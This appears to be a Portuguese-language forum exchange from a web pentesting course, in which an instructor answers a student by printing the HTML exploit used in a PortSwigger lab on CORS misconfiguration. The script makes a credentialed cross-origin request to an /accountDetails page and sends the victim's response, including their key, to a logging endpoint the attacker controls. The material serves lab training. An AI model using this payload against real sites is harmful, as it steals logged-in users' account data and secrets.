Esse script em html usado na aula, onde posso baixar? Não encontrei em lugar nenhum
Esse script em html usado na aula, onde posso baixar? Não encontrei em lugar nenhum
Olá, Gabriel.
Tudo bem?
O script é um arquivo chamado cors-lab.html
e é usado para fazer uma solicitação à página /accountDetails
de um domínio específico. Ele usa a função XMLHttpRequest()
para fazer essa solicitação e coleta os dados do usuário que clicar no link, você encontra o código dele aqui: https://cursos.alura.com.br/course/pentest-vulnerabilidades-servidor-aplicacoes-web/task/110203
Aqui está um exemplo de como esse script pode ser:
<html>
<body>
<script>
var xhrequest = new XMLHttpRequest();
// Preencha com a URL do seu laboratorio aqui:
var url = "https://0a1300a304007a54c01661fd00b600e1.web-security-academy.net"
xhrequest.open('GET', url + "/accountDetails", true);
xhrequest.withCredentials = true;
xhrequest.send(null)
xhrequest.onreadystatechange = function() {
if (xhrequest.readyState == XMLHttpRequest.DONE){
fetch("/log?key=" + xhrequest.responseText)
}
}
</script>
</body>
</html>
Lembre-se de conferir e substituir a URL pelo endereço que está no seu navegador.
Espero ter ajudado e bons estudos!